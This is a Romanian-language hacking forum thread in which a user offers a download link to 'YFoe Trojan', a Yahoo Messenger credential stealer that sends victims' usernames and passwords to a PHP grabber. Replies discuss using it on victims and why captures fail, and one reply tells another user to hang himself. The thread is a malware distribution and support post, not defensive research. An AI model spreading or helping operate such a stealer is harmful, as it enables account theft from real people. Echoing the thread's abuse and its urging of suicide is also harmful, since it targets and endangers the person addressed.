Jump to content
SlicK

YFoe Trojan

Recommended Posts

Download: http://rootb0x.com/yfoe.rar

Prinscreen:

yfoe.jpg

Acest trojan este facut special pt Y! Messenger. Atunci cand victima apasa pe butonul "Sign In" userul si parola introduse de el sunt trimise la PHP Grabber.

In arhiva este si un exemplu de 'grab.php' pe care il puteti folosi...

Functioneaza si cu optiunea 'multi' activa la YM.

Testat pe YM8 dar ar trebui sa functioneze pe orice versiune.

Well, Enjoy :)

Link to comment
Share on other sites

SlicK cand dau test la graber imi trimite in data.txt testuser si testpas ( adica ar trebuii sa mearga ).Pana aici bun numai ca atunci cand victima intra in .exele facut cu graberul si da sign out si intra iar pe yahoo messenger nu se trimite nimic in data.txt .

:roll:

E posibil sa aiba optiunea Remember my ID&Password activata, nu cred ca merge daca este asa.

Link to comment
Share on other sites

Bah fratzilor, bagatzi si voi un tutorial!! Mah, si mie nu cred ca imi da toate fisierele, in folderu` yfoe am: fsg, grab, stub, YFoe-Builder!!

Mai trebuie ceva??

P.S. Sa bagatzi tutorialu` ala!!

you are so fucking idiot ! te ai uitat mai sus sa vezi ca SlicK a facut tutorial video ?

Link to comment
Share on other sites

Tu esti varsza bah!!1 Dak ala crezi tu k e tutorial, uitate-n plm in dictionar sa vezi mai bine!!!!!

Ti-a mai zis cineva ca ai IQ-ul negativ ? Nu ma surprinde reactia ta dar iti pot sugera ca si un melc reactiona mai bine decat tine.

Sfat : ia-ti doi metri de funie si un sapun si spanzura-te ca traiesti degeaba.

SlicK uite de ce ai pierdut tu timpul si ai stat sa codezi in C++ ca sa vina un retard ca asta sa iti strice topicul ca nu il duce pe el capul.Daca nici dintr-un tutorial video nu inteleg ... mare e curtea Domnului.

Link to comment
Share on other sites

SlicK cand dau test la graber imi trimite in data.txt testuser si testpas ( adica ar trebuii sa mearga ).Pana aici bun numai ca atunci cand victima intra in .exele facut cu graberul si da sign out si intra iar pe yahoo messenger nu se trimite nimic in data.txt .

:roll:

E posibil sa aiba optiunea Remember my ID&Password activata, nu cred ca merge daca este asa.

da... asa e.. nici la mine nu merge....

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...